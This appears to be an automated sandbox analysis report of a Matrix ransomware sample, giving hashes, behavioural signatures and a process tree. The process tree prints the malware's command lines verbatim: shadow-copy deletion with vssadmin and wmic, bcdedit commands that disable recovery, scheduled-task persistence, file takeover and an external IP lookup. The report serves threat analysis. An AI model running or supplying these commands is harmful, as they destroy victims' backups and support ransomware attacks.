Analysis

  • max time kernel
    150s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    08-10-2020 15:06

General

  • Target

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Malware Config

Extracted

  • Language
    ps1
  • Source
    ps1.dropper
  • URLs
    http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 498 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 11 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 7625 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 108 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
    "C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\NWodi944.exe"
      2⤵
        PID:1920
      • C:\Users\Admin\AppData\Local\Temp\NWodi944.exe
        "C:\Users\Admin\AppData\Local\Temp\NWodi944.exe" -n
        2⤵
        • Executes dropped EXE
        PID:1968
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ST2Yn9mk.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:108
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blacklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1164
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BJ2ttsem.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BJ2ttsem.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          • Modifies Control Panel
          PID:828
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
          • Modifies Control Panel
          PID:524
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
          3⤵
          • Matrix Ransomware
          • Modifies Control Panel
          PID:752
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\SysWOW64\wscript.exe
          wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat" /sc minute /mo 5 /RL HIGHEST /F
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1388
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat" /sc minute /mo 5 /RL HIGHEST /F
              5⤵
              • Creates scheduled task(s)
              PID:1324
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1836
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /I /tn DSHCA
              5⤵
                PID:1576
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\HRiS85Na.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\SysWOW64\attrib.exe
            attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
            3⤵
            • Views/modifies file attributes
            PID:1400
          • C:\Windows\SysWOW64\cacls.exe
            cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
            3⤵
              PID:1904
            • C:\Windows\SysWOW64\takeown.exe
              takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
              3⤵
              • Modifies file permissions
              PID:1480
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
              3⤵
              • Loads dropped DLL
              PID:1000
              • C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe
                GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1284
                • C:\Users\Admin\AppData\Local\Temp\GBVottoK64.exe
                  GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
                  5⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Modifies service
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: LoadsDriver
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1216
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {4CA8C3E2-9FB4-4250-86BD-FB786BBAC5A4} S-1-5-21-403932158-3302036622-1224131197-1000:ELJKIHEZ\Admin:Interactive:[1]
          1⤵
            PID:1404
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat"
              2⤵
                PID:568
                • C:\Windows\system32\vssadmin.exe
                  vssadmin Delete Shadows /All /Quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:1440
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic SHADOWCOPY DELETE
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1544
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                  3⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1224
                  • C:\Windows\system32\vssadmin.exe
                    "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                    4⤵
                    • Interacts with shadow copies
                    PID:792
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} recoveryenabled No
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1544
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:556
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN DSHCA /F
                  3⤵
                    PID:1336
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Modifies service
                • Suspicious use of AdjustPrivilegeToken
                PID:1688

Network

MITRE ATT&CK Enterprise v6

Downloads
